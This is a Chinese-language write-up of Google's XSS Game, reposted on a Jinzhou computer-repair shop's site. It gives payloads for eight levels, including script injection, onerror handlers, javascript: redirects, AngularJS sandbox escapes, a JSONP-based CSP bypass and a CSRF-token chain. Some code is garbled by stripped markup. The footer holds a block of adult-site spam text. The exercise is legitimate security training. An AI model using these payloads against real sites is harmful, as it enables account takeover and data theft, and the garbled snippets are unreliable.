錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項目 服務(wù)報價 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
Google最新XSS Game Writeup

作者: 佚名  日期:2017-05-05 07:55:57   來源: 本站整理

 本文介紹了如何完成谷歌最新的XSSGame的過程,完成了這八個挑戰(zhàn)就有機(jī)會獲得Nexus 5x。實際上這八個挑戰(zhàn)總體來說都不難,都是些常見的xss。通關(guān)要求是只要能彈出alert窗口即可。
第一關(guān) 
 反射型xss,在搜索框提交的內(nèi)容最后會出現(xiàn)在結(jié)果頁面的html代碼里,沒有任何過濾,直接搜索:
script>alert('freebuf')script>

第二關(guān)
 還是反射型,提交內(nèi)容后會有一定延遲。通過查看html源碼可以知道延遲的時間(timer=)被直接插入到了img標(biāo)簽里的onload事件里:
id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('');" />

 直接請求url:/?timer=’-alert(1)-’,通關(guān)。
第三關(guān)
 展示了一些貓的圖片,當(dāng)圖片換了后,url只是變化了#后面的內(nèi)容(#1 > #2),感覺可以通過這個id來反射xss
查看源代碼:
function chooseTab() {
     var html = "Cat " + parseInt() + "
";
     html += " +  + ".jpg' />";
      
     document.getElementById('tabContent').innerHTML = html;
      
     // Select the current tab
     var tabs = document.querySelectorAll('.tab');
     for (var i = 0; i if (tabs[i].id == "tab" + parseInt()) {
             tabs[i].className = "tab active";
         } else {
             tabs[i].className = "tab";
         }
     }
      
     window.location.hash = ;
      
     // Tell parent we've changed the tab
     top.postMessage({'url': self.location.toString()}, "*");
}
 哼,根據(jù)上一關(guān)的靈感,感覺可以繼續(xù)利用一下on事件,修改id后,圖片肯定是不存在的,于是使用onerror:
    #1'onerror=alert(1)>

 
搞定
第四關(guān)
 打開后是一個注冊頁面,讓我們填寫郵箱地址,注冊完成后通過url里面的next參數(shù)把我們跳轉(zhuǎn)回主頁,查看源碼:
 script>
  setTimeout(function() { window.location = user provided>; }, 1000);
script>
 在html中,鏈接可以是js代碼,比如:
a href="javascript:...">a>
直接請求這個跳轉(zhuǎn)url:
confirm?next=javascript:alert(1)
 

第五關(guān)
 一個F歌(foogle)搜索框,使用了angularJS 1.5.8,感覺是爆過漏洞的,上某網(wǎng)搜索(angularjs 1.5.8 injection)找到利用方法:
?utm_term=&utm_campaign={{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

 第六關(guān)
 angularJS 1.2版本的搜索框,在搜索框中提交的內(nèi)容最終進(jìn)到了class為ng-non-bindable的div標(biāo)簽里:
  #普通的div標(biāo)簽
Normal: {{1 + 2}}
  #輸出:Normal: 3
  #ng-non-bindable
Ignored: {{1 + 2}}
  #輸出:Ignored: {{1 + 2}}
 隨后發(fā)現(xiàn)如果直接提交花括弧會被刪掉,于是使用“{”,最后構(gòu)造這樣一個url:
?query={{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
第七關(guān)
 通過GET(參數(shù)menu)和JSONP請求加載了一個博客頁面,而響應(yīng)的title,pictures會被處理為h1標(biāo)簽和img標(biāo)簽。關(guān)卡提示:common CSP bypass。
 猜測xss

可能會在menu參數(shù)里,JSONP里的callback參數(shù)(知識擴(kuò)展)可以用來注入我們的js代碼,開始構(gòu)造我們的url:
?menu=base64_encode(script src="jsonp?callback=alert(1)%3b%2f%2f">script>)
第八關(guān)
 要求是對任何用戶都有效,無論是登錄的還是未登錄的,要想通過必須得利用CSRF,self-xss,CSP。/transfer下是個很明顯的反射性xss,所以難度在于怎樣設(shè)置csrf_token可以匹配cookie。
 最后發(fā)現(xiàn)在登錄后會有一個請求設(shè)置用戶cookie并把用戶重定向到主頁,url如下:
 set?name=username&value=&redirect=index #作孽啊!
 根據(jù)這個url就可以猜測到后端代碼寫得是有多簡陋。。。
有了這個作孽的東西,我們就可以設(shè)置自己的csrf_token并把用戶重定向到/transfer,以便執(zhí)行我們注入的js代碼。構(gòu)造如下url:
set?name=csrf_token&value=csrf_token>&redirect=url_encode(/transfer?name=freebufer&amount=3">script>alert(1)script>&csrf_token=csrf_token>)

寫出這種代碼的,在我們那是要被BGM的! 高中生第一次寫writeup,如有不足望擔(dān)待,勿噴。



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動時提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 亚洲熟妇无码av另类vr影视| 少妇无码太爽了不卡视频在线看 | 人妻丝袜无码专区视频网站 | 亚洲最大无码中文字幕| 精品国产V无码大片在线看| 免费A级毛片无码A∨免费| 亚洲成?v人片天堂网无码| AV无码精品一区二区三区| 国产亚洲?V无码?V男人的天堂 | 亚洲国产精品无码AAA片| 无码精品不卡一区二区三区| 国产亚洲大尺度无码无码专线| 亚洲av永久中文无码精品 | 久久久久久无码Av成人影院| av无码a在线观看| 无码被窝影院午夜看片爽爽jk | 人妻中文无码久热丝袜| 久久国产精品成人无码网站| 无码国产精成人午夜视频一区二区| 亚洲精品无码日韩国产不卡?V| 无码福利写真片视频在线播放| 午夜不卡久久精品无码免费| 亚洲日韩精品无码专区网站| 日韩精品无码成人专区| 亚洲精品无码专区在线| 亚洲日韩一区二区一无码| 久久久久亚洲精品无码蜜桃| 人妻无码一区二区不卡无码av| 亚洲AV日韩AV永久无码绿巨人| 亚洲日韩乱码中文无码蜜桃臀网站 | 成人无码嫩草影院| 亚洲精品无码少妇30P| 一本一道VS无码中文字幕| 制服在线无码专区| 亚洲精品久久久久无码AV片软件| 亚洲看片无码在线视频| 亚洲av无码无线在线观看| 乱人伦人妻中文字幕无码| 国产裸模视频免费区无码| 亚洲Av无码乱码在线观看性色| 国产精品一区二区久久精品无码|